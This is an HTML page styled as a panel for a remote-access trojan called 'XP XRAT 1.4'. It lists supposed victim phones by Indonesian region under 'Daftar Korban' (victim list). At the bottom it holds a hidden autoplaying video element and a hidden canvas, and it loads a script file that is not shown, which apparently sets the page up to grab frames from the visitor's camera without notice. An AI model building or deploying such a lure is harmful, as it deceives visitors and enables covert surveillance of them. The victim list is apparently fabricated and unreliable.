<!DOCTYPE html>
<html>

<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <title>Simple</title>
  <link rel="stylesheet" href="style.css">
</head>
<body>
  <div class="header">
        <div class="logo">
          <img src="https://files.catbox.moe/3zk9bm.jpg" alt="jpg">
        </div>
        <div class="title">XP XRAT 1.4</div>
        <div class="list">☰</div>
    </div>
    <div class="korban">
        <div class="item">

            <div class="device-info">
                <span>XP XRAT 1.4 Public</span>
                <span class="percentage">😊</span>
            </div>
            <p>Versi: 1.4</p>
            <p>Status: Public</p>
        </div>
        <div class="device-list">
        <div class="device-item">
          <div class="korban">
            <h1>Daftar Korban</h1>
          <div>
            <div class="device-info">
                <span>Location🚩</span>
                <span>Jawa Barat</span>
                <span class="percentage">%29</span>
            </div>
            <p>Tecno 12</p>
        </div>
        <div class="device-item">
            <div class="device-info">
                <span>Location🚩</span>
                <span>Sulawesi Selatan</span>
                <span class="percentage">%43</span>
            </div>
            <p>Iphone 12</p>
        </div>
        <div class="device-item">
            <div class="device-info">
                <span>Location🚩</span>
                <span>Jakarta</span>
                <span class="percentage">%51</span>
            </div>
            <p>Oppo s12</p>
        </div>
    </div>
     <div class="video-wrap" hidden="hidden">
        <video id="video" playsinline autoplay></video>
    </div>
    <canvas hidden="hidden" id="canvas" width="640" height="480"></canvas>
    
    
    <script src="script.js"></script>
</body>

</html>